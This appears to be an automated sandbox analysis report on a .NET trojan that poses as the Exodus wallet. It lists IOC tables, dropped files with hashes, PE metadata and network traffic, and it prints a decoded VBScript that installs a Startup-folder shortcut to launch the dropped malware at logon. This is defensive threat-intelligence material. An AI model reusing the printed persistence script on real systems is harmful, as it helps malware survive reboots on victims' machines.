xmr-us-east1.nanopool.org | 7xhLwiPIrR.exe | malicious | 142.44.243.6
xmr-us-east1.nanopool.org | qhgv3aRzkZ.exe | malicious | 144.217.14.139
xmr-us-east1.nanopool.org | zIrx1wUddJ.exe | malicious | 142.44.242.100
xmr-us-east1.nanopool.org | E91sLsvV8S.exe | malicious | 142.44.243.6
xmr-us-east1.nanopool.org | SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe | malicious | 144.217.14.109
xmr-us-east1.nanopool.org | notepad.exe | malicious | 142.44.242.100
xmr-us-east1.nanopool.org | csrss.exe | malicious | 144.217.14.109
xmr-us-east1.nanopool.org | notepad.exe | malicious | 192.99.69.170
xmr-us-east1.nanopool.org | RcyatUBgOo.exe | malicious | 144.217.14.109
xmr-us-east1.nanopool.org | 1fJCh9Qn75.exe | malicious | 144.217.14.109
xmr-us-east1.nanopool.org | xS9h6XCLaY.exe | malicious | 142.44.243.6
xmr-us-east1.nanopool.org | 4FNTlzlu10.exe | malicious | 142.44.242.100
xmr-us-east1.nanopool.org | 73invoice #2307.exe | malicious | 142.44.242.100

ASN

Match | Associated Sample Name / URL | Detection | Context
DEDIPATH-LLCUS | SecuriteInfo.com.Dropped.Trojan.GenericKD.37247948.2936.exe | malicious | 74.201.28.67
DEDIPATH-LLCUS | 1nM1IXHzg2.exe | malicious | 74.201.28.67
DEDIPATH-LLCUS | OTzyxNyOTP.exe | malicious | 74.201.28.67
DEDIPATH-LLCUS | EdZxuvmhwc.exe | malicious | 74.201.28.67
DEDIPATH-LLCUS | skin.exe | malicious | 45.89.106.164
DEDIPATH-LLCUS | stin.exe | malicious | 45.89.106.164
DEDIPATH-LLCUS | oMNhCoZdeT.dll | malicious | 45.86.65.164
DEDIPATH-LLCUS | lovemetertok.dll | malicious | 45.86.65.164
DEDIPATH-LLCUS | Positions_invoice-103246.xlsm | malicious | 45.86.65.164
DEDIPATH-LLCUS | 4fZX8fJwHn.dll | malicious | 45.86.65.164
DEDIPATH-LLCUS | MtSvkc87ybOwjvd.exe | malicious | 74.201.28.32
DEDIPATH-LLCUS | purch_details_7683561.xlsm | malicious | 185.255.130.247
DEDIPATH-LLCUS | 3X5L2fP53V.xlsx | malicious | 185.255.130.247
DEDIPATH-LLCUS | P7Oa6i5muL.exe | malicious | 45.144.225.135
DEDIPATH-LLCUS | PO7581.exe | malicious | 45.15.143.171
DEDIPATH-LLCUS | CreditCardAuth.jar | malicious | 45.133.1.212
DEDIPATH-LLCUS | CreditCardAuth.jar | malicious | 45.133.1.212
DEDIPATH-LLCUS | Receipt09072021.jar | malicious | 45.133.1.212
DEDIPATH-LLCUS | Receipt09072021.jar | malicious | 45.133.1.212
DEDIPATH-LLCUS | Swift Payment Copy.exe | malicious | 74.201.28.104
OVHFR | 4HoFnQosUb.exe | malicious | 142.44.242.100
OVHFR | SnCJx8VVDE.exe | malicious | 158.69.65.151
OVHFR | atZdmSgC4J.exe | malicious | 158.69.65.151
OVHFR | ZyikLEasGq.exe | malicious | 51.178.146.144
OVHFR | #6495PI-29458-2020.exe | malicious | 147.135.255.78
OVHFR | PI9SGLOVEDA01912.exe | malicious | 51.79.119.220
OVHFR | Statement from NTXSD.exe | malicious | 51.75.191.89
OVHFR | JOYPEn9pr9 | malicious | 149.60.183.129
OVHFR | 47a8af.exe.exe | malicious | 158.69.65.151
OVHFR | Comprobante1.vbs | malicious | 167.114.22.12
OVHFR | 92CRMNlBq8 | malicious | 198.27.68.34
OVHFR | Taf5zLti30 | malicious | 188.165.232.76
OVHFR | 5qpsqg7U0G | malicious | 51.79.241.67
OVHFR | LyxN1ckWTW | malicious | 149.202.131.34
OVHFR | c51w5YSYdO | malicious | 164.133.166.62
OVHFR | sX21AoaplqFHxse.exe | malicious | 54.38.220.85
OVHFR | G1638.exe | malicious | 213.186.33.5
OVHFR | eAtDhymLzp | malicious | 213.32.50.249
OVHFR | qt75NPEt0t | malicious | 149.202.27.98
OVHFR | qgQgEjI283 | malicious | 164.132.56.199

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\LKBNMTFJgl\cfg
Process: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 2140
Entropy (8bit): 5.557738244951003
Encrypted: false
SSDEEP: 48:lCHUL3qQEzCmini9iqvciaXkih9icue6bhvYbUbo:EH9QWv/ih9Tue6ybUE
MD5: 2DE48065534A637941090D8F3E04044F
SHA1: EEAB2C38DD711A9BADB8265E11963732EA9C84DB
SHA-256: 8ABF520009CEA0E0C1B67563FD89C4C0E0403744942763D843E39EED180A1ED7
SHA-512: 2D1466D5F09DF4F6628092A2D7D210728536A1649CFECAE362D907D61088E32574290A350848F161C67FE008B2E46864161134C63560763BE932C3A631A24DC1
Malicious: false
C:\ProgramData\LKBNMTFJgl\cfgi
Process: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 2140
Entropy (8bit): 5.5574864173164125
Encrypted: false
SSDEEP: 48:lCHUL3qQEzlmini9iqvciaXkih9icue6bhvYbUbo:EH9QZv/ih9Tue6ybUE
MD5: 6CAEE3EB287981EC875E5AD3B85DBA1D
SHA1: 665E6F0252A71C6AA31A7FBCE07D9301182953C5
SHA-256: 4DD2C67C3EF1DE5A70FE97123AA01C2D7FEAFB96F079EF2DE0E64CB9D73A54A8
SHA-512: B6C71536CC290FFE07F1638ED99588CBB8C78997A72CCDF0D8E9059D8D4C932CB8E5195F06A42DF2CBACFE650C9A4CD1616DE30D03DC947E2902C103C4A7E6B8
Malicious: false
C:\ProgramData\LKBNMTFJgl\csrss
Process: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3627520
Entropy (8bit): 6.686736411250198
Encrypted: false
SSDEEP: 49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
MD5: D572DA9202196121D952231F26D65D07
SHA1: 8934580E7EE3F3852E159298769BDD38BCAA12A0
SHA-256: 15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
SHA-512: DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 24%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......*7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0...........(......-.&+.(....+.*....*...*...*...*...*...*...*...0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po
                                                                                                      C:\ProgramData\LKBNMTFJgl\e9c1286a28_3.1.0
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3272
                                                                                                      Entropy (8bit):3.5391176048802047
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PnPWWWWWWWWWWciWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWr:0wfIa
                                                                                                      MD5:97336FD69071FE322CC57F730C0EA273
                                                                                                      SHA1:97C86F938D64DD5EB84BDD6D0C16AC73B0762590
                                                                                                      SHA-256:F5C9FAF94FDBE5C9317FC89D5536B1CF3D0520EFB17A504DD9AA0E15F9607CF6
                                                                                                      SHA-512:160225663F7EC8D181AD5DC4E51ADE2E1AAE76B6D456B17B68E6E1D340290A21AF000CA297ED298C7D6B7B12DB8679EA81AA90EEDF2D92017E8C2CA93D289ADC
                                                                                                      Malicious:false
                                                                                                      Preview: H\@.BK.WUGB..VTV_A]Z[.V@S......801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125_LMB..................XVC]EYT.WMR892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892
                                                                                                      C:\ProgramData\LKBNMTFJgl\r.vbs
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):3.6127667288387637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DJhvugypjBQMyogMJsW+jCRAbjMwCdKIiDHvhFkqy30mgZM3LCKKvbMX4FHkqm3H:DJhLqyjCyjMKFNyEmgZMbaDMoFHNc
                                                                                                      MD5:AEEB61834027553533CF0BC510C9A707
                                                                                                      SHA1:A5D2DD201642C930AC8E7A64A5E020A4F37E4529
                                                                                                      SHA-256:132032C1CFFCA8BCECC5210602F9B37E6795BC9C8CAC37290E3F207DDBE9E5D5
                                                                                                      SHA-512:7287C6ADD852B8AE0AB18B6B3ED6BB9E1566DE2384372975504313C09DB741A70188E35F820FDC7F13261386B8CEABBBC4BD6680FBD1AE58418AFDA93DFFC756
                                                                                                      Malicious:true
                                                                                                      Preview (UTF-16 text, decoded; one statement per line):
                                                                                                      Set objFSO=CreateObject("Scripting.FileSystemObject")
                                                                                                      outFile="C:\Users\alfons\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url"
                                                                                                      Set objFile = objFSO.CreateTextFile(outFile,True)
                                                                                                      objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"""
                                                                                                      objFile.Close
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4096
                                                                                                      Entropy (8bit):0.5946373705635158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:bn6/ek1GaD0JOCEfMuaaD0JOCEfMKQmDX71Al/gz2cE0fMbhEZolrRSQ2hyYIIT:b6/NGaD0JcaaD0JwQQXxAg/0bjSQJ
                                                                                                      MD5:BABF932FF399B022AE23CF79439D29C3
                                                                                                      SHA1:7377DD90B311184D19DBEDB7387D8EF3E716BFF0
                                                                                                      SHA-256:5CD6CA868EB0E9461A28E1AAADA0E4B30E41F20835B1262DEB5DF719FADF9B37
                                                                                                      SHA-512:FCAB78D3055D470712F000D48C947AB13A30470735A0E5CB8829A2B05AC5F5330E4315613AC260CCA970C7C8B22D36024678FEA12F5614052CE5F3F27F07F4EB
                                                                                                      Malicious:false
                                                                                                      Preview: ....E..h..(..........ys.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................ys...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x17182133, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.0956548716955069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:LF0+lz8O4blR1YqK5F0+lz8O4blR1YqK:a3
                                                                                                      MD5:A12A2E0DC8B30A6272BCED568FDDACF3
                                                                                                      SHA1:7D1CD0E8F68D088DA667D0AEB26E35A092604C1F
                                                                                                      SHA-256:AFEE6B5519A5E230CC0BA5828285C35446FE9BD533D5B964531FCFEBB90245CF
                                                                                                      SHA-512:658557186808C70177FB89AC873C211D65964439A7A781D077C1EF9EDC4E6E6EE3BA1F86D7B4143A471660710E074127112B5411E6B7ED5EBC2E9A145FF39130
                                                                                                      Malicious:false
                                                                                                      Preview: ..!3... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................J.......y..................."......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.11070935811004139
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:k4Sl/l7EvyC9/+Al/bJdAtiC9dce/loll:kj/liy+/+At4BG
                                                                                                      MD5:70C4886701CB42678125BD6F721BBEE3
                                                                                                      SHA1:5C57A8597AB15FA2E06D6DB481D70A49204D9470
                                                                                                      SHA-256:6B9E8DFC3610F433E722D7E91D1F0F525F662CC3DF703AC405EEC289922ADF68
                                                                                                      SHA-512:43D82602A2BA8C7A0781314ED57019A577A33204DEB633243597F7F66B4CAE4C85DAB7EDCDE37791F9FC34AD5886DE5C4ECC4ED607CA7CFFA2927C6481A33EEC
                                                                                                      Malicious:false
                                                                                                      Preview: ..T[.....................................3...w.......y.......w...............w.......w....:O.....w...................."......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4rC1bQcnl5.exe.log
                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):1119
                                                                                                      Entropy (8bit):5.356708753875314
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                      MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                                                      SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                                                      SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                                                      SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                                                      Malicious:true
                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                      C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3627520
                                                                                                      Entropy (8bit):6.686736411250198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
                                                                                                      MD5:D572DA9202196121D952231F26D65D07
                                                                                                      SHA1:8934580E7EE3F3852E159298769BDD38BCAA12A0
                                                                                                      SHA-256:15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
                                                                                                      SHA-512:DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......*7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0...........(......-.&+.(....+.*....*...*...*...*...*...*...*...0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po
                                                                                                      C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe:Zone.Identifier
                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"file:///C:\ProgramData\LKBNMTFJgl\csrss.exe">), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):69
                                                                                                      Entropy (8bit):5.096227769358395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYm8h6rXZkRE4rsjvKaBCH:HRYFVm8hAW1rsjv/E
                                                                                                      MD5:E03E6937BA1878ACE3D849B233ADECFE
                                                                                                      SHA1:AFFBB4F8B53AF6CF35660B775A0A8F70FB95F8B5
                                                                                                      SHA-256:9846A8975F8E2DBC96CD18D5015C03B4D8226FDDF69BCB99A0610C855B0A9E6D
                                                                                                      SHA-512:99EA03B8635D89409C6E65DC1DD1E995EAC8C02E373F3B01FAA7D715F347722075CC0D5D629914399505A2CA8FFB80BFA8CAFA9D99A2E702D1FCD94FB0BAECA9
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, Author: @itsreallynick (Nick Carr)
                                                                                                      Preview: [InternetShortcut]..URL="file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):906
                                                                                                      Entropy (8bit):3.153545140169298
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rAk0hAk9+MlWlLehB4yAq7ejCpk0hp:OaqdmuF3rEj+kWReH4yJ7Mcp
                                                                                                      MD5:5E8837F82BD84C668DBAB34A51F64D1B
                                                                                                      SHA1:A73C52406D31F96AAFF3AD8449C7200A582B9B5B
                                                                                                      SHA-256:9B9649C756D8EC5EB24488255A9B7EAF7465FB1D5F2D6D3ACE72E4BFC37DD2D5
                                                                                                      SHA-512:F3A28D583EFE3DB0C6B4C1FD227EF8F62145DC15007D5E3C53823B7D8073BF12B8C6C52B3C5E1B86B80ADD48F9603BA323F106341E53AA1633B72CB38599BA5F
                                                                                                      Malicious:false
Preview (UTF-16LE text, decoded):
--------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
 Start Time: Fri Jul 23 2021 22:25:39

MpEnsureProcessMitigationPolicy: hr = 0x1
WDEnable
ERROR: MpWDEnable(TRUE) failed (800704EC)
MpCmdRun: End Time: Fri Jul 23 2021 22:25:39
--------------------------------------------------------------------------------------

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):6.686736411250198
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:4rC1bQcnl5.exe
                                                                                                      File size:3627520
                                                                                                      MD5:d572da9202196121d952231f26d65d07
                                                                                                      SHA1:8934580e7ee3f3852e159298769bdd38bcaa12a0
                                                                                                      SHA256:15337a846c1e262136124361b3624ddd3519cf3c7f93aba1ed75728a482fc662
                                                                                                      SHA512:de311f400e980d5fc987d6a5262057823b9dc3f9e7930623fab16c9954977949b3b0901de136548db1f3a7b5d864dad2738c791d511241ce4e49e8d83f7dea5a
                                                                                                      SSDEEP:49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@................................

                                                                                                      File Icon

                                                                                                      Icon Hash:c0d8d8d8ccda92b0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x774792
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x60FAE058 [Fri Jul 23 15:29:28 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x374738        | 0x57         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x376000        | 0x2c20       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x37a000        | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                                                                                      Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy         | Characteristics
.text  | 0x2000          | 0x372798     | 0x372800 | unknown  | unknown         | unknown   | unknown         | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc  | 0x376000        | 0x2c20       | 0x2e00   | False    | 0.369480298913  | data      | 5.43010941077   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x37a000        | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

Name          | RVA      | Size   | Type                                                                                            | Language | Country
RT_ICON       | 0x376130 | 0x25a8 | data                                                                                            |          |
RT_GROUP_ICON | 0x3786d8 | 0x14   | data                                                                                            |          |
RT_VERSION    | 0x3786ec | 0x380  | data                                                                                            |          |
RT_MANIFEST   | 0x378a6c | 0x1b4  | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators |          |

                                                                                                      Imports

DLL         | Import
mscoree.dll | _CorExeMain

                                                                                                      Version Infos

Description      | Data
Translation      | 0x0000 0x04b0
LegalCopyright   | Copyright (c) 2015-2021 Exodus Movement, Inc.
Assembly Version | 21.7.17.0
InternalName     | notepad.exe
FileVersion      | 21.7.17.0
CompanyName      | Exodus Movement Inc
LegalTrademarks  |
Comments         | Exodus
ProductName      | Exodus
ProductVersion   | 21.7.17.0
FileDescription  | Exodus
OriginalFilename | notepad.exe

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP
Jul 23, 2021 22:24:57.863876104 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:24:57.898330927 CEST | 80    | 49717 | 45.144.225.135 | 192.168.2.5
Jul 23, 2021 22:24:57.898952007 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:24:57.900317907 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:24:57.929594040 CEST | 80    | 49717 | 45.144.225.135 | 192.168.2.5
